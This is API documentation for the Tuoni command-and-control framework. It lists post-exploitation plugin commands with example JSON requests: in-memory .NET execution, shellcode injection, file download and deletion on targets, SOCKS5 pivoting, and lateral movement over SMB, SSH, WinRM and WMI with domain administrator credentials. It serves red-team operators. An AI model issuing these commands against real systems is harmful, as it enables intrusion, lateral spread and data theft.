Skip to content

Plugin commands

List on default plugin commands, their configuration and examples.

Command names vs ID(GUID) values

Tuoni supports multiple commands sharing the same name. Ideally, this occurs only when these commands pertain to different types of agents, though this is not strictly enforceable. Therefore, all commands provided by plugins are also assigned unique ID values (GUID type).

When querying the API for all available command plugins/templates, a list of plugins and their respective commands is returned. Each command in this list includes both a name and a unique ID. While command names may not be unique, their ID values always are.

As GUIDs are unique per server instance, then another field fullyQualifiedName can be used to correlate same command execution.

To avoid confusion, the list of available commands returned by agent API requests includes command IDs instead of names. This ensures clarity and prevents any potential ambiguity.

Commands templates

1
GET {{url}}/api/v1/command-templates

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
[
  {
   "id":"72f44650-0011-4562-a474-39acb28725d5",
   "name":"rm",
   "pluginId":"shelldot.commands.fs",
   "scope":"global",
   "qualifiedName":"shelldot.commands.fs:global:rm",
   "fullyQualifiedName":"shelldot.commands.fs:global:rm",
   "description":"Remove a file or a directory on the target"
...

For example, in this environment, the command "powershell" has the ID value fc44c562-a9a6-44b6-b9b4-4f91c4fca8af.

List of agents

1
GET {{url}}/api/v1/agents

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
[
  {
    "guid": "4e2b499a-2847-adb6-ec36-3172103a5cbb",
    "firstRegistrationTime": "2024-07-30T18:51:51.059Z",
    "lastCallbackTime": "2024-07-30T18:56:52.385Z",
    "metadata": {
      "guid": "4e2b499a-2847-adb6-ec36-3172103a5cbb",
...
      },
      "customProperties": {}
    },
    "active": true,
    "recentListeners": [
      {
        "id": 2,
        "href": "/api/v1/listeners/2"
      }
    ],
    "availableCommandTemplates": [
      "fc44c562-a9a6-44b6-b9b4-4f91c4fca8af",
      "92f14674-9192-40e6-8dcf-69dd2e9acab6",
...
      "de9a6db5-dd75-4b6a-b012-d77335dc9862",
      "b50f9c9d-b508-4fcf-8e4e-bcba8e8fe28d"
    ]
  }
]

The command ID value fc44c562-a9a6-44b6-b9b4-4f91c4fca8af is also present in the availableCommandTemplates list, indicating that this command is available for this agent.

Using name/ID

The Tuoni server accepts both the command name and ID in the "template" field when sending a command. If a name is used, the server attempts to determine the correct command. In most cases, there should be no conflict, and names can be used reliably, although this is not guaranteed. In the current examples, we continue to use the name value for the sake of readability.

connect-smb

Used along with "Relay Agent Bind SMB" listener. The agent created using that listener, will expect a connection from parent agent that can be triggered using this command.

Parameters:

  • host: IP or domain name to use to connect to the SMB agent
  • pipename: SMB pipe name to use to connect to the SMB agent

connect-tcp

Used along with "Relay Agent Bind TCP listener" listener. The agent created using that listener, will expect a connection from parent agent that can be triggered using this command.

Parameters:

  • host: IP or domain to connect to TCP-BIND agent
  • port: TCP port number to connect to TCP-BIND agent

Example(POST content)

1
2
3
4
5
6
7
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "host": "192.168.12.12",
    "port": 8888
  }
}

execute-assembly

Executes .NET executable in memory

Parameters:

  • executable: .NET executable file content (if provided via API, have to be base64 encoded)
  • parameters: Parameters to be provided to .NET as command line arguments

Example(MULTIPART POST content)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
------WebKitFormBoundaryGIYTV5nKBPoBJRPT
Content-Disposition: form-data; name="requestBody"; filename="blob"
Content-Type: application/json; encoding=utf-8

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "parameters": ["audit"]
  }
}
------WebKitFormBoundaryGIYTV5nKBPoBJRPT
Content-Disposition: form-data; name="executable"; filename="Sharpup.exe"
Content-Type: application/x-ms-dos-executable


------WebKitFormBoundaryGIYTV5nKBPoBJRPT--

rm

This command deletes file in agent filesystem

Parameters:

  • filepath: Path of the file to delete (environment variables are supported)

Example(POST content)

1
2
3
4
5
6
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "filepath": "c:\\some\\dir\\to_delete.txt"
  }
}

download

Read (and download) a file from the target filesystem

Parameters:

  • filepath: Path of the file to read (environment variables are supported)

Example(POST content)

1
2
3
4
5
6
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "filepath": "c:\\some\\dir\\s3cr3t.txt"
  }
}

upload

Write (aka upload) a file to target filesystem

Parameters:

  • filepath: Path of the file being written (environment variables are supported)
  • file: Content of the file (if provided via API, have to be base64 encoded)

Example(POST content)

1
2
3
4
5
6
7
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "filepath": "c:\\some\\dir\\hello.txt",
      "data": "SEVMTE8gV09STEQ="
  }
}

inject

Injects and executes shellcode

Parameters:

  • shellcode: shellcode to execute (if provided via API, have to be base64 encoded)

Example(POST content)

1
2
3
4
5
6
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "shellcode": "{some type of shellcode in base64}"
  }
}

jump-service

Command for lateral movement. You can copy file to target machine over SMB and then create & start service pointing to that or any other executable

Parameters:

  • payloadId: Payload used in jump - should be service exe
  • copyMethod: What method to use for copying payload (SMB, NONE)
  • copyPath: Where to copy file in target machine
  • target: Target machine ip/name
  • servicePath: Path of the created service
  • serviceName: Name of the created service
  • serviceDisplayName: Display name of the created service
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example(POST content)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_service.exe",
    "target": "target-machine",
    "servicePath": "c:\\new_service.exe",
    "serviceName": "new-service",
    "serviceDisplayName": "New service",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-ssh

Command for lateral movement. You can copy file to target machine over SMB and then run it or any command over SSH

Parameters:

  • payloadId: Payload used in jump - should be executable exe
  • copyMethod: What method to use for copying payload (SMB, NONE)
  • copyPath: Where to copy file in target machine
  • target: Target machine ip/name
  • cmdline: Command line to run on target machine
  • username: Username to use for copy and jump
  • password: Password to use for copy and jump
  • privateKeyPassword: Password of the private key file

Example(POST content)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-winrm

Command for lateral movement. You can copy file to target machine over SMB and then run it or any powershell command over Windows Remote Management

Parameters:

  • payloadId: Payload used in jump - should be executable exe
  • copyMethod: What method to use for copying payload (SMB, NONE)
  • copyPath: Where to copy file in target machine
  • target: Target machine ip/name
  • executablePath: Path of the executable to run
  • customPowershell: Custom powershell to run
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example(POST content)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "executablePath": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-wmi

Command for lateral movement. You can copy file to target machine over SMB and then run it or any command over Windows Management Instrumentation

Parameters:

  • payloadId: Payload used in jump - should be executable exe
  • copyMethod: What method to use for copying payload (SMB, NONE)
  • copyPath: Where to copy file in target machine
  • target: Target machine ip/name
  • cmdline: Command line to run on target machine
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example(POST content)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

procinfo

Returns additional information about agent's process

Parameters: None

Example(POST content)

1
2
3
4
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {}
}

screenshot

Makes screenshot on target machine and returns the picture

Parameters: None

Example(POST content)

1
2
3
4
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {}
}

socks5

Creates SOCKS5 proxy into agent network

Parameters:

  • port: Port that is opened by C2 for user to use as socks5 proxy

Example(POST content)

1
2
3
4
5
6
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "port": "8765"
  }
}

spawn

Spawns new agent

Parameters:

  • payloadId: What listener the agent will connect
  • payloadType: Type of the payload
  • encryptedCommunication: Should communication be encrypted

Example(POST content)

1
2
3
4
5
6
7
8
{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": "1",
    "payloadType": "WINDOWS_X64_STAGELESS",
    "encryptedCommunication": true
  }
}